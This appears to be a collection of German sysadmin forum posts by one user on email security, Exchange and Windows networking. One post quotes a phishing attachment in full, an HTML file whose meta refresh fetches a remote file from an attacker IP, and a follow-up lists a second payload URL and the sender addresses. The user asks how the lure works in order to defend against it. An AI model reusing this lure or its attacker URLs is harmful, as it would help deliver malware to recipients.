zahni

Danke. Kann man sowas im O365 irgendwo "verstellen"? Wie geschrieben: Man bastelt hier mit einer Exchange-Hybrid-Konfig rum, weil man unbedingt unsere internen Kalender in Teams sehen will. Ich bin da raus. Ich forsche gerade an einem anderen Thema, wo es sehr anstrengend ist, wenn man auf Logs von DL keinen Zugriff hat und der DL wieder was macht, was er nicht sollte...

Hi, mir ist gerade aufgefallen, dass unser letzter DMARC-Report von Aggregate Report <dmarcreport@microsoft.com> vom 23.02. ist. Ist das bei Euch auch so oder hat irgendwer im Zuge Exchange Hybrid wegkonfiguriert? (Ich habe davon keine Ahnung, wenn dann unserer DL)

Die Anleitung funktioniert nicht? https://support.microsoft.com/de-de/windows/upgrade-von-windows-home-auf-windows-pro-ef34d520-e73f-3198-c525-d1a218cc2818#WindowsVersion=Windows_10 Da braucht man kein Tool für.

Die MA können telnet installieren und starten? Mal davon abgesehen, gibt es technische Header. Dort findet man die Absender-IP-Adresse.

Ah ja, stimmt. Als wir von unserem neuen DL eine neue feste IP bekommen haben, hatte T-Online die auch auf der schwarzen Liste. Die Sinnhaftigkeit von RBL's...

Man hat Dir geschrieben, dass Du von deinem DSL-Anschluss mit dynamischer IP-Adresse (also bei jeder Einwahl eine andere IP-Adresse), keine Mails direkt senden darfst. Maßnahme: Mindestens ein Business-DSL-Vertrag mit fester IP als buchbare Option.

Du musst auf Sicherheit - Erweitert gehen und dort den Besitz übernehmen. Verhindern kannst Du es, wenn User auf der Freigabe nur das Recht "ändern" bekommen und nicht Vollzugriff. Mit "Ändern" können keine NTFS-Rechte verändert werden.

Natürlich läuft da noch der normale cloudbasierte Spam-Filter. Meinte zumindest unser DL. Vernünftig konfigurierte Server mit SPF und DKIM sind schon etwas schwieriger einzurichten. Ob RBL der Weisheit letzter Schluß sind, besonders wenn die sich über ein bezahltes "Entlisten" finanzieren? Manche könnten das als Wegelagerei bezeichnen.

Das macht bei uns Fortimail. Schrieb ich ja schon. Was und wo dort: K.A. Wir haben doch einen DL... Edit: Hier Doku: https://docs.fortinet.com/document/fortimail/7.4.0/cookbook/529623/configuring-incoming-email-dmarc-checking-with-spf-and-dkim Da kann man alles nach Wunsch einstellen.

Unser DL hatte und empfohlen, ganz auf die RBL's zu verzichten, da es nie ganz klar ist, wer dort die Hoheit hat. Teilweise wollen die auch noch Geld, wenn man dort runter will. Aktuell nutzen wir SPF/DMARC und DKIM und lassen aktuell aber noch Mails durch, die weder SPF noch DKIM haben. Das hängt leider mit unseren Kunden zusammen. Ansonsten Reject, falls SPF oder DKIM nicht stimmen.

Zur 2. Frage: Da muss Du eine statische Route definieren (findest Du bei Google). Clients müssen dann diesen PC als Gateway benutzen. Bei der 1. Frage bin ich überfragt. Du darfst nur auf einer NIC ein Default Gateway oder gar keins eintragen. Windows macht gern Multihoming und schickt Antworten oft über das falsche Interface raus. Windows sollte nur mit einer NIC betreiben werden. Ich kenne die Anforderungen an das dortige Netzwerk nicht, daher solltest Du mit solchen Aktionen vorsichtig sein, weil Du u.U. das "Hauptnetz" gefährdest

Hallo und Willkommen im Forum, ich kann nur generell schreiben: Das führt zu nichts. Das mit dem Routing kann man lösen, jedoch wird das interne Netz trotzdem gefährdet. Einfach Beispiel: Du fängst Dir über den öffentlichen Zugang eine Virus ein, z.B. ein Ransonware. Der verschlüsselt Dir trotzdem Deinen PC und alle erreichen internen Ressourcen und kann sich über Sicherheitslücken oder zu hohen Rechten im internen Netz dort ausbreiten. Für den Monitoring gibt es in der Regel Agenten, die man in den "anderen" Segmenten installieren kann. Den expliziten Zugriff vom Agenten zum Monitoring-Host regelt man über eine explizite FW-Regel. Das macht man nicht mit einem Windows 11-PC.

Zuerst würde ich ein CHKDSK (ohne F) probieren. Wenn es sinnvolles Ergebnis gibt, chkdsk /F ausführen. Der Fehler kann auftreten, wenn man ein LW nicht sauber entfernt, sondern einfach den Steck zieht. Aber entsprechend der Wichtigkeit, die Ratenschläge oben beachten,

Es sieht danach aus: https://gbhackers.com/pikabot-edr-evasion/ Wobei immer noch nicht klar ist, wozu die Binäre-Datei gut ist und warum ein Browser die TXT-Datei ausführen sollte,

Ja, die haben es ja an unsere IT-Sicherheit gemeldet. Wir haben dann noch den Applocker... Ich halte es übrigens für wichtig, dass man die TXT-Datei per IP-Adresse abruft. Gut möglich, dass genau hier eine Zonen-Prüfung fehlschlägt (Sicherheitslücke). PS: Eben wieder so eine Mail. Diesmal hat der Virenscanner auf unserem SMTP-Gateway zugeschlagen.

Hier noch eine andere URL (falls die andere down ist): file://103.124.104.22/ zjxb/bO.txt Habe leider keine Header. In den weitergeleiteten Mails der MA steht Von: ***** <NQuigley@bluecall.org> Von: **** <HDare@otbforged.com>

Hi, bei uns ist jetzt mehrfach sowas aufgeschlagen: Mail, die vorgibt aus unserem Haus zu sein (mit sehr alter Signatur, usw,.) Ein ZIP-Anhang mit einer HTML-Datei, und eine Binär-Datei (sieht verschlüsselt aus), Dateiname ein Buchstabe. In der HTML-Datei steht als Beispiel: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Unsere-Domäne.de</title> </head> <body> <meta http-equiv="Refresh" content="0; url='file://204.44.125.68/ mcqef/yPXpC.txt'" /> <div>Voluptas dolores animi nisi qui placeat cumque minima minus. Dolorem aut est dolor dolorem qui. Nihil consequatur eligendi molestiae sunt consequatur ut laboriosam quia. Aut in suscipit suunt tempora.</div> </body> </html> (Leerzeichen von mir). Idee, wie das funktionieren soll? Oder wird eine Sicherheitslücke im Browser ausgenutzt? Ziel ist natürlich Binärfilter im Proxy und Mail auszutricksen.

Wir hatten am Ende 8.5.xx. Noch unter dem IBM-Namen. Der Verkauf ist mir bekannt. Eigentlich ist es immer noch eine Alternative zu Exchange. Der Webclient wurde schon damals groß ausgebaut. Wir gehen aber lieber in Cloud....

Die Version kam l.t. Google 1997 raus. Da war MS immer noch im Experimental-Status. Alle Datenbanken bei Notes/Domino kann man natürlich auch lokal replizieren. Damals hat das auch Sinn gemacht (verfügbare Serverhardware, etc). Bei uns wurde Notes zuletzt nur vom Server genutzt. Domino/Notes hatten damals eher Probleme, wenn mehr 100.000 Einträge einer NSF-Datenbank waren. Hier konnten Die User sich dann ein lokales Archiv konfigurieren. Aber Exchange hat ja auch so seine Probleme mit zu vielen Mails in einer Datenbank. Was HCL aus dem Produkt aktuell gemacht hat und wer es noch nutzt: Keine Ahnung.

Die Lösung ist im Moment so. In der Fa. am LAN mit lokalen Ressourcen, zu Hause per VDI. Wir haben auch noch Entwickler usw. Teilweise gibt es auf den NB auch noch Anwendungen, die wir von der VDI fernhalten wollen oder müssen. Mal wegen Aktivierungs-Gedöns und mal auch wegen der Größe es Images. Aber wir entwickeln uns, im Gegensatz zu Exchange, immer weiter...

Auch OT: Jo, stand irgendwo. Die Netapp hat sich aber bisher nicht beschwert und Outlook hat uns nicht verpetzt. Generell geht die Welt nicht unter, wenn des die OST's zerlegt. Dann wird es gelöscht und der User darf Kaffee trinken gehen. Das wäre auch alles nicht nötig, wenn Exchange nicht so ein lahmes Konstrukt wäre. Das Ding soll nur Mails speichern und Kalender führen. Das konnte schon Lotus Domino ohne "Cache Mode" wesentlich performanter.

HI, habe ich befürchtet. Dann müssen die User eben damit leben. Wir werden nochmal informieren, dass man Outlook nur 1x starten soll.

Hi, wir versuchen gerade den Cached Mode auszurollen, da es Performance-Probleme im Exchange-Cluster gibt, die sich in einer Hybrid-Konfig noch verstärken (k.a. warum). Die Cache-Datei liegt per UNC auf einer Netzressource, die der User normalerweise nicht erreicht. Grund ist hier die VDI-Umgebung, die keine persistenten lokalen Ressourcen bereitstellt und der alternativen Nutzung einen Notebooks, wenn man in der Fa. ist. Jedenfalls funktioniert es. Allerdings scheinen sich User z.T. mehrfach anzumelden, z.B. wenn sie in einer Besprechung sind. Kann man Outlook irgendwie mitteilen eine FM anzuzeigen, wenn die OST-Datei gelockt ist, anstatt eine neue Datei anzulegen und wieder alle Mails des Zeitraums vom Exchange herunterzuladen? Danke im Voraus.

Mami, warum hatte ich einen Home-Server zu Hause und habe ihn irgendwann zum Inhaber einen Leitungsposition auf dem Dachboden befördert?

Weil es egal ist. Leider kann ich auch nicht sagen, woran das festgemacht wird. Vermutlich ist es aber AD-Standortbezogen.